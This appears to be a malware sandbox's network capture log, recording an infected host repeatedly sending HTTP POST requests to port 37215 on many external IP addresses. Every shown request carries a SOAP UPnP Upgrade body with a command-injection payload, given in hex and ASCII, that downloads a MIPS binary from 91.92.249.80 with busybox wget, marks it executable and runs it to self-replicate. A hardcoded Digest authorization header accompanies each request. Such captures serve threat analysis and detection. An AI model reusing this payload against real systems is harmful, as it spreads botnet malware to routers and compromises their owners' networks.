                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2022192.168.2.2356588157.51.57.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594965935 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2023192.168.2.2355688157.215.27.7337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.595285892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2024192.168.2.2355154157.23.169.8637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.595299959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2025192.168.2.234743041.35.162.10837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.595304966 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2026192.168.2.235947041.108.200.17037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.595350027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2027192.168.2.2337636149.80.205.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.596946001 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2028192.168.2.2341188197.2.21.8137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.596946001 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2029192.168.2.2350018157.187.18.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597065926 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2030192.168.2.2356452157.106.128.18837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597141981 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2031192.168.2.2340572145.50.155.5837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597184896 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 